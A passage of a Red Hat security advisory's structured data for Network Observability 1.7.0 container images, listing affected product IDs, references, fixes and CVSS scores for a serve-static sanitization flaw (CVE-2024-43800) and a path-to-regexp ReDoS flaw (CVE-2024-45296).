"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43800", }, { category: "external", summary: "RHBZ#2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43800", url: "https://www.cve.org/CVERecord?id=CVE-2024-43800", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", url: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", url: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", }, { category: "external", summary: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", url: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", }, ], release_date: "2024-09-10T15:15:17.937000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "serve-static: Improper Sanitization in serve-static", }, { cve: "CVE-2024-45296", cwe: { id: "CWE-1333", name: "Inefficient Regular Expression Complexity", }, discovery_date: "2024-09-09T19:20:18.127723+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310908", }, ], notes: [ { category: "description", text: "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).", title: "Vulnerability description", }, { category: "summary", text: "path-to-regexp: Backtracking regular expressions cause ReDoS", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45296", }, { category: "external", summary: "RHBZ#2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45296", url: "https://www.cve.org/CVERecord?id=CVE-2024-45296", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", url: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", url: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", url: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", }, ], release_date: "2024-09-09T19:15:13.330000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", 